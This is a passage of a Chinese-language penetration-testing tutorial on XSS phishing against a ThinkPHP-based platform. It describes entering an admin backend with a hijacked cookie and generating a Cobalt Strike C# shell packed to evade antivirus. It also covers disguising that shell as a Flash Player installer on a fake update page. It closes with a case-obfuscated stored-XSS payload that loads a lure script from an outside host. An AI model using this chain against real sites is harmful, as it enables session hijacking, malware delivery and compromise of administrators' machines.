渗透测试之地基钓鱼篇：thinkphp平台XSS钓鱼(3)

send执行后，通过cookie进入到了管理员后台！

复制URL！

浏览器中访问后，正常进入管理员后台！

在公网服务器搭建钓鱼页面，任何能访问互联网客户都可以访问该页面！

利用Cobal Strike生成C#语言的shell...

利用该shell进行混淆，并利用python的tinyaes模块混淆也行，在来个分离免杀，最后利用pyinstaller生成exe外壳...必过全国杀毒软件！（不演示过程）
将flash修改名字为：flashplayer_install_cn.exe（或者修改为update等吸引人下载的名称都行）

这是Flash贷款平台源码文件目录！！

修改index.html代码，找到其中href="进行修改为：flashplayer_install_cn.exe 意思就是点击页面立即下载就能自动下载目录下的exe后门文件！

在准备个js文件，意思是执行该js后，会在页面提示：

您的 FLASH 版本过低，尝试升级后访问该页面!

并访问到该页面：

将exe和js都上传到功能网服务器apache底层！
测试访问可看到正常读取，确保内网管理员能执行XSS后访问到js文件，这里就可以开始了！

可看到利用（三）中XSS利用的方法，执行插入：

"><sCRiPt sRC=http://flash.dayuixiyou.cn/flash-test.js></sCrIpT><"
#需要前后加入闭合 "> <"